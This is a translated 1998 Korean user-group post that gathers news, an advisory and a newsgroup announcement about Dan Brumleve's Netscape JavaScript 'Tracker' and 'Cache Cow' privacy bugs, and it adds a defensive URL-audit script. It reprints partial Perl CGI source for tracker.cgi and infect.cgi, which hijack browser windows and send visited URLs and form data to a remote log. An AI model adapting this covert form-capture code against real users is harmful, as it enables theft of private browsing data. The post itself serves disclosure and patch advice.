1998. 10. 1. 23:22
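Hello.
This is Lee Kyoung (Solaromi), assistant sysop of the HiTEL go IUG Internet User Group.
This material is the original text about the Netscape bug found by Dan Brumleve,
a US computer consultant, which the Korean press reported all at once after
"USA Today" in the US recently became the first(?) to report it.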
[USA Today] http://www.usatoday.com
Material (1)
[Source] http://www.2cobbs.com/news/tracker.html
--===Tracker NetScape Navigator JavaScript Trojan Horse===--
-=NetScape Navigator JavaScript Trojan Horse=-
Below is a link to Dan Brumleve's page which demonstrates the Tracker
NetScape Navigator JavaScript Trojan Horse. Here is a screen shot of what the
sample exploitation does:
_Warning_: if you are using NetScape Navigator and have not disabled
JavaScript before visiting this page, clicking on this link will commence the
tracking process, which _will_ record anything you enter into forms on pages
you visit during subsequent browsing, until you exit or close the browser, even
if the page is "secure" and uses SSL. This affects versions through 3.02. It
does not affect Microsoft Internet Explorer, but Tracker will try to load and
cause an error message.
Click here to visit Tracker page
http://www.aleph2.com/tracker
but you have been warned and we will not be
held responsible for what happens.
When we get a chance we will be adding some commentary on this item. In the
meantime, Alex Lash and Nick Wingfield at CNET are doing a decent job of
"tracking" it (even if they didn't quote me :-)
+ July 11 CNET story
http://www.news.com/News/Item/0,4,12347,00.html
+ July 9 CNET story
http://www.news.com/News/Item/0,4,12282,00.html
This page updated July 12, 1997 by webloke [stephen@iu.net] Copyright, 1997,
_____________________________________________________________________
Material (2)
-=JavaScript and Java Privacy/Security Flaws=-
+ _9/25/98_ - (updated 2:00 PM 9/29 -0500) - Dan Brumleve reported a
JavaScript flaw in Netscape browsers and email clients that would allow a
malicious server operator to read the contents of a user's browser cache file
after the user merely visits the malicious page. This would allow the
malicious server to determine the URLs of pages the user has visited in the
past, and in some cases, the values the user has entered in forms on those
pages. The exploit can also be embedded in an email message and triggered by
merely reading the email message.
No malicious exploits of the flaw have been reported to date.
The flaw is said to apply to all versions of Netscape that support JavaScript,
that is all versions of Netscape from 2.x to 4.5b2. Microsoft Internet
Explorer is said not to be affected.
Netscape has acknowledged the bug and plans to release a fix within a week.
Until a fix is available, users of Netscape browsers are advised to _disable
JavaScript_ except when visiting known and trusted sites.
_____________________________________________________________________
Material (3)
Source: see the newsgroups listed below
From: nothing@shout.net (Mr.Nothing)
Newsgroups: comp.lang.javascript,comp.infosystems.www.browsers.misc,
comp.infosystems.www.browsers.ms-windows,
comp.infosystems.www.browsers.x,comp.security.misc
Subject: New JavaScript Privacy Bug Found, Part 2
Date: 25 Sep 1998 23:45:40 GMT
Organization: Shouting Ground Technologies, Inc.
Hello.
I've discovered another JavaScript security hole. I've written
an exploit for it (called the Cache Cow) and it is being demonstrated
at the following URL:
http://www.shout.net/~nothing/cache-cow/index.html
The vulnerability allows anyone to steal the contents of your
browser history, including all form data that has ever been
sent via the GET method. It affects all versions of Netscape
that support JavaScript. It does not affect Internet Explorer.
The exploit only affects versions of Netscape prior to 4.06,
but an exploit for 4.06 will be demonstrated on the same page
shortly.
Also see
http://www.shout.net/~nothing/cache-cow/last-time.html
for my take on what happened the last time I made this kind of
announcement.
Dan Brumleve
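Added example (not part of the original post and not Dan Brumleve's code): form data submitted with GET becomes part of the URL, so it is stored wherever URLs are stored, which is the history data the post above says Cache Cow reads. The JavaScript below audits a list of history-style URLs for query parameters that carry sensitive form values; the field-name list, function names and sample URLs are constructed assumptions.

```javascript
// Added example: flag history/log URLs whose query string carries form data
// that should have gone in a POST body. All names and samples are constructed.

// Assumed name fragments marking a field as sensitive (substring match over-reports).
const SENSITIVE = ["pass", "pwd", "card", "ssn", "secret", "token"];

function isSensitiveName(name) {
  const n = name.toLowerCase();
  return SENSITIVE.some((frag) => n.includes(frag));
}

// One finding per sensitive, non-empty parameter in a URL's query string.
function auditUrl(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch (e) { return []; } // not an absolute URL
  const findings = [];
  // URLSearchParams decodes %XX escapes and "+" the way form decoding does.
  for (const [name, value] of url.searchParams) {
    if (value !== "" && isSensitiveName(name)) {
      findings.push({
        page: url.origin + url.pathname,
        param: name,
        valueLength: value.length, // report the length, never the value
        overTls: url.protocol === "https:", // TLS does not keep it out of history
      });
    }
  }
  return findings;
}

const auditHistory = (urls) => urls.flatMap(auditUrl);

// Constructed sample history entries.
const sampleHistory = [
  "http://shop.example/login?user=alice&password=hunter2",
  "https://bank.example/pay?card%5Fnumber=4111+1111&amount=10",
  "http://search.example/find?q=netscape+3.04",
  "https://bank.example/login", // POST login: nothing in the URL
  "not a url",
];

for (const f of auditHistory(sampleHistory)) {
  console.log(`${f.page}: "${f.param}" (${f.valueLength} chars)${f.overTls ? " [TLS]" : ""}`);
}
```

Forms flagged this way should be switched to POST so their values never appear in a URL.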
_____________________________________________________________________
Material (4) While copying this script the line width was set to 79 columns, so
some line breaks differ from the original; please review the script and adjust it.
[Source] http://oliver.efri.hr/~crv/security/bugs/mUNIXes/nscape6.html
COMMAND
javascript
SYSTEMS AFFECTED
Systems running Netscape
PROBLEM
This is a variation of the javascript #1. I say variation since
CERT and Netscape are saying that Netscape 3.02 is fixing this, but
it didn't appear to fix the problem demonstrated at:
http://www.aleph2.com/tracker/
This page demonstrates a bug discovered with Netscape's
implementation of JavaScript. If your version and platform is
affected, your subsequent browsing activities are currently being
tracked. Known affected versions are Netscape 3.x for all
platforms, including the just-released 3.02 which supposedly
fixes this problem. Credit goes to Dan Brumleve.
Here is the source of the two CGI scripts that make this work on
the page mentioned above. An explanation of how the exploit works is
included as a comment in the tracker.cgi source.
Source of tracker.cgi (one part):
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
#
# ----------------------------------------------------------------
# Explanation of the exploit:
#
# When your browser loads this page, another window ("infect.cgi")
# is created using the onLoad mechanism. If you're using
# X-windows this window will be placed off the screen because its
# size overflows into its position, otherwise it will simply be
# 0x0.
#
# When the "infect.cgi" window loads it sets the original window's
# onUnload function to some JavaScript code that copies the
# location and form data into the values of a form in the
# "infect.cgi" window. This should not be possible to do, but I
# found a way to use "javascript:" URLs to pass private data
# between windows.
#
# After the original window copies its information into the form
# in "infect.cgi" it tells that form to submit (the action being
# itself). Here is where the big problem happens: The original
# window's onUnload function exits before the "infect.cgi" window
# finishes changing location. By the time the "infect.cgi" window
# finishes submitting, the original window is at a new location,
# so the "infect.cgi" window changes the onUnload function of the
# new document as soon as it loads, and the cycle continues...
chop($tm = `date`);
$log = "/www/html/tracker/logs/log-$ENV{REMOTE_ADDR}.txt";
unless (-e $log) {
    open(FP, "> $log");
    print FP <<EOT;
Below is a list of all the URLs you've visited since
$tm, each one followed by the
contents of any forms on those pages.
EOT
    close(FP);
}
print < Content-type: text/html
Tracker
link="#ff0000" vlink="#ff0000" alink="#ff0000"
onLoad="window.open('http://www.aleph2.com/tracker/infect.cgi', 'infect',
'width=65529,height=65536')">
.... [the original source of web page] ....
Source of infect.cgi:
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
$infect = "http://www.aleph2.com/tracker/infect.cgi";
print <<EOF;
Content-type: text/html

Infect
EOF
exit 0 if fork;
if ($ENV{QUERY_STRING}) {
    $input = $ENV{QUERY_STRING};
    $fn = "/www/html/tracker/logs/log-" . $ENV{REMOTE_ADDR} . ".txt";
    # Split the query string into name=value pairs on "&"
    @fields = split(/&/, $input);
    foreach $a (@fields) {
        $a =~ s/\+/ /g;    # "+" encodes a space
        ($n, $v) = split(/=/, $a);
        # Decode %XX escapes in the value
        $v =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $input{$n} = $v;
    }
    # Indent each line of the submitted form data ("fd") for the log
    @fields = split(/\n+/, $input{fd});
    $fd = "";
    foreach $f (@fields) {
        $f = " " . $f;
        $fd .= $f . "\n";
    }
    # Append the timestamp, the visited URL and the form data to the log
    open(FP, ">> $fn") || die;
    chop($tm = `date`);
    print FP "$tm $input{url}\n$fd";
    close(FP);
}
exit 0;
SOLUTION
Communicator 4.01 did not seem to be affected by the problem.
Users of Netscape 3.x versions should upgrade to Netscape 3.04.
Since Netscape Navigator is installed by default on IRIX 6.2+
operating systems, the solution for them is to install or upgrade
to version 3.04 or later of the Netscape Navigator program.
Silicon Graphics provides a customized Netscape Navigator 3.04
subsystem for IRIX 5.3, 6.2, 6.3 and 6.4 and it can be found at
the following URL:
http://www.sgi.com/Products/Evaluation/
Thank you. Goodbye.
*_From Suwon_*_ looking out over Manseokbo_*_Solbau_*
Copyright (C) by -=-=-=- Damoa Information & Communications (다모아정보통신) -=-=-=-
TEL.0331-252-3691 PCS.019-275-5269 PGR.015-8455-0095
Room 505, 5th floor, Green Plaza, 644-5 Hwaseo-dong, Jangan-gu, Suwon-si, Gyeonggi-do Internet
Lee, Kyoung (이경) HiTEL ID:LEESUN2 (Solaromi) leesun2@iwork.co.kr
Web-Hosting,Homepage,Javascript,Information-Contents-Provider(ICP)
Internet-Consulting,Internet-Tele-Marketing, Information-Retriever
If you copy this material by any means, please include the copyright notice above.